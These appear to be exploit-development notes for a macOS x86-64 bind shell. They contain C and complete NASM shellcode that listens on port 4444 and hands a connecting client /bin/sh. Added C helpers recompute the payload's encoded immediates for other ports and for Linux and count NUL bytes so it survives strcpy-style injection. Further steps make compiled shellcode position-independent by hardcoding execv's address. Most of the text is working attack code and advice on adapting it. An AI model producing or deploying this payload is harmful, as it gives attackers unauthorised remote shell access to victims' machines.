Bind Shell
C code for a bind shell (the syscall sequence the shellcode below reproduces):
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    int s = socket(2, 1, 0);              /* AF_INET, SOCK_STREAM, protocol 0 */
    /* macOS/BSD sockaddr_in, 16 bytes: sin_len (1), sin_family (1),
       sin_port (2), sin_addr.s_addr (4), sin_zero[8] (8) */
    struct sockaddr_in addr = {0};        /* sin_len = 0, sin_zero = 0 */
    addr.sin_family = 2;                  /* AF_INET */
    addr.sin_port = htons(4444);          /* 4444 = 0x115c, stored as bytes 11 5c */
    addr.sin_addr.s_addr = 0;             /* INADDR_ANY */
    bind(s, (struct sockaddr *)&addr, 0x10);
    listen(s, 0);
    int c = accept(s, 0, 0);
    for (int i = 2; i >= 0; i--)          /* dup2(client, 2), dup2(client, 1), dup2(client, 0) */
        dup2(c, i);
    execve("/bin/sh", 0, 0);
    return 0;
}
Final:
; macOS x86-64, nasm syntax; the syscall numbers are the macOS BSD ones
bits 64
global _main
_main:
    ; socket(AF_INET=2, SOCK_STREAM=1, 0)
    xor rsi, rsi
    mov rdx, rsi            ; rdx = 0 (protocol)
    inc rsi                 ; rsi = 1 (SOCK_STREAM)
    mov rdi,rsi
    inc rdi                 ; rdi = 2 (AF_INET)
    push 0x61
    pop rax                 ; SYS_socket = 97
    bts rax, 25             ; rax |= 0x2000000: macOS BSD syscall class
    syscall
    mov r10,rax             ; r10 = listening socket
    ; bind(sock, &addr, 16)
    mov rdi,r10
    push 0x10
    pop rdx                 ; rdx = sizeof(struct sockaddr_in) = 16
    xor rsi,rsi
    push rsi                ; sin_zero[8] = 0
    mov esi,0x5c110200      ; bytes 00 02 11 5c 00 00 00 00: sin_len=0, sin_family=2, sin_port=htons(4444), sin_addr=0
    push rsi
    push rsp
    pop rsi                 ; rsi = &addr (on the stack)
    push 0x68
    pop rax                 ; SYS_bind = 104
    bts rax,25
    syscall
    ; listen(sock, 0)
    mov rdi,r10
    xor rsi,rsi
    push 0x6a
    pop rax                 ; SYS_listen = 106
    bts rax,25
    syscall
    ; accept(sock, NULL, NULL)
    mov rdi,r10
    xor rsi,rsi
    xor rdx,rdx
    push 0x1e
    pop rax                 ; SYS_accept = 30
    bts rax,25
    syscall
    mov r10,rax             ; r10 = client socket
    ; dup2(client, 2), dup2(client, 1), dup2(client, 0)
    mov rdi,r10
    push 0x2
    pop rsi                 ; rsi = target fd, counting down from 2
dup_loop:                   ; "loop" is a reserved mnemonic in nasm, so the label is renamed
    push 0x5a
    pop rax                 ; SYS_dup2 = 90
    bts rax,25
    syscall
    dec rsi
    jns dup_loop            ; stop after fd 0 (rsi goes negative)
    ; execve("/bin//sh", NULL, NULL)
    xor rdx,rdx
    mov rdi,'/bin//sh'      ; 8 bytes, NUL-terminated by the rdx pushed next
    push rdx
    push rdi
    mov rdi,rsp             ; rdi = pointer to "/bin//sh" on the stack
    xor rsi,rsi             ; argv = NULL
    push 0x3b
    pop rax                 ; SYS_execve = 59
    bts rax,25
    syscall
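As an added example, not code from the original notes: the two encodings the shellcode above hides in immediates, written out in C so they can be regenerated for another port. macos_syscall_nr reproduces what push/pop/bts does to rax, and sockaddr_in_qword builds the first 8 bytes of the sockaddr_in that "mov esi,0x5c110200; push rsi" places on the stack. It goes beyond the notes in two ways: it also builds the Linux layout (2-byte sin_family, no sin_len), which yields a different immediate for the same port, and it counts NUL bytes in the immediate, since the macOS encoding carries one (sin_len = 0). Function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* macOS places BSD ("UNIX class") syscalls at 0x2000000 | nr.  The shellcode
 * builds this with "push nr; pop rax; bts rax, 25", i.e. it sets bit 25. */
uint32_t macos_syscall_nr(uint32_t bsd_nr) {
    return (1u << 25) | bsd_nr;
}

/* First qword of a 16-byte sockaddr_in, as the little-endian value the
 * shellcode loads into esi and pushes (the second qword, sin_zero, is 0).
 * bsd_layout != 0: sin_len(1) sin_family(1) sin_port(2) sin_addr(4)   (macOS)
 * bsd_layout == 0: sin_family(2) sin_port(2) sin_addr(4)              (Linux, added here)
 * ip is the address in dotted order; NULL means INADDR_ANY as in the notes. */
uint64_t sockaddr_in_qword(int bsd_layout, uint16_t port, const uint8_t ip[4]) {
    uint8_t b[8] = {0};
    if (bsd_layout) { b[0] = 0; b[1] = 2; }   /* sin_len = 0, sin_family = AF_INET */
    else            { b[0] = 2; b[1] = 0; }   /* sin_family = AF_INET as 16-bit LE */
    b[2] = (uint8_t)(port >> 8);              /* sin_port in network byte order */
    b[3] = (uint8_t)(port & 0xff);
    for (int i = 0; i < 4; i++)               /* sin_addr in network byte order */
        b[4 + i] = ip ? ip[i] : 0;
    uint64_t q = 0;
    for (int i = 7; i >= 0; i--)              /* little-endian: b[0] is the low byte */
        q = (q << 8) | b[i];
    return q;
}

/* Number of zero bytes in the low `width` bytes of an immediate.  The page's
 * mov esi, 0x5c110200 encodes sin_len = 0 as a NUL byte, which matters if the
 * shellcode has to survive a strcpy-style copy into the target. */
int count_nul_bytes(uint64_t imm, int width) {
    int n = 0;
    for (int i = 0; i < width; i++)
        if (((imm >> (8 * i)) & 0xff) == 0)
            n++;
    return n;
}

int main(void) {
    printf("socket: rax = 0x%x\n", macos_syscall_nr(0x61));
    printf("macOS sockaddr_in qword for port 4444: 0x%llx\n",
           (unsigned long long)sockaddr_in_qword(1, 4444, NULL));
    printf("Linux sockaddr_in qword for port 4444: 0x%llx\n",
           (unsigned long long)sockaddr_in_qword(0, 4444, NULL));
    printf("NUL bytes in the 32-bit immediate: %d\n",
           count_nul_bytes(sockaddr_in_qword(1, 4444, NULL), 4));
    return 0;
}
```

The Linux value differs in the first two bytes only (02 00 instead of 00 02), which is exactly the mistake that makes a macOS bind-shell stub fail with EAFNOSUPPORT on Linux and vice versa.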
Examine the shellcode:
Write shellcode in C
The C version hardcodes function addresses instead of resolving symbols.
gcc output is easier to turn into shellcode than clang output.
PIC (position-independent code) here means the compiled function must not reference anything outside the bytes that will be copied out as shellcode: no absolute addresses, no data in other sections, no calls through dyld stubs.
lea rdi, [rip+0x2c] and call 0x7 <dyld_stub_binder+0x100003f86> are problematic: the lea takes the address of the "/bin/bash" literal stored outside the code, and the call goes through the lazy-binding stub for execv. Both refer to locations outside the code segment.
Use char b[] = {'/','b','i','n','/','b','a','s','h',0}; in place of the literal "/bin/bash". The bytes are then written onto the stack with immediate stores and the lea disappears.
One issue is resolved. The call into the stub section still has to be eliminated.
Define execv yourself and set its address manually: declare a function-pointer type with execv's signature, create a variable of that type, and cast an address into it. Any address works as a placeholder while checking the disassembly; it stands in for execv.
No call into the stub section any more; the call now goes through the register holding the address.
Print the address of execv from a helper program, then hardcode that value in the code. The hardcoded address is only valid for the library build and load address it was taken from; with ASLR it differs across boots and machines, so it has to be re-read for each target.
Fixed.
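As an added example, not the notes' own code, the two fixes above in one file: the "/bin/bash" built on the stack from single chars, and a typed function pointer cast from a raw integer address so that no execv symbol (and therefore no stub) is referenced. The names build_path, execv_address and exec_via_address, the convention of passing the address as argv[1], and the test double recording_execv (which stands in for execv and does not replace the process) are this example's assumptions. Run it without arguments to print execv's address, the step before hardcoding; run it with that address to call through it.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Function-pointer type with execv's signature.  The shellcode calls through
 * a value of this type holding a raw address, so the execv symbol itself is
 * never referenced and no dyld stub is emitted. */
typedef int (*execv_fn)(const char *path, char *const argv[]);

/* Build "/bin/bash" on the stack from individual chars.  A char-array
 * initializer rather than a string literal makes the compiler emit stores of
 * immediates instead of a rip-relative lea into a string section. */
void build_path(char out[10]) {
    char b[] = {'/', 'b', 'i', 'n', '/', 'b', 'a', 's', 'h', 0};
    for (int i = 0; i < 10; i++)
        out[i] = b[i];
}

/* The "print the address of execv" step: what gets pasted in as a constant. */
uintptr_t execv_address(void) {
    return (uintptr_t)execv;
}

/* Call execv through a raw address rather than through its symbol. */
int exec_via_address(uintptr_t addr, const char *path, char *const argv[]) {
    execv_fn fn = (execv_fn)addr;        /* the cast the notes describe */
    return fn(path, argv);
}

/* Test double (hypothetical, for checking only): records the path it was
 * called with and returns 42 instead of replacing the process. */
static char last_path[32];
static int recording_execv(const char *path, char *const argv[]) {
    (void)argv;
    strncpy(last_path, path, sizeof last_path - 1);
    return 42;
}

/* Runs the exec-through-address path against the test double.  Returns 1 when
 * the call went through the raw address and received the stack-built path. */
int selftest(void) {
    char path[10];
    build_path(path);
    char *args[] = { path, NULL };
    int rc = exec_via_address((uintptr_t)recording_execv, path, args);
    return rc == 42 && strcmp(last_path, "/bin/bash") == 0;
}

int main(int argc, char **argv) {
    if (argc < 2) {                      /* no address given: print execv's */
        printf("execv is at 0x%lx\n", (unsigned long)execv_address());
        return 0;
    }
    char path[10];
    build_path(path);
    char *args[] = { path, NULL };
    uintptr_t addr = (uintptr_t)strtoull(argv[1], NULL, 0);
    return exec_via_address(addr, path, args);   /* the hardcoded-address call */
}
```

In the real shellcode the address is a literal constant in the source, not argv[1]. After compiling, check the disassembly of the function (objdump -d or otool -tV): at higher optimization levels the compiler may still turn the char array into a memcpy from a read-only section, which reintroduces exactly the out-of-segment reference the stack array was meant to remove.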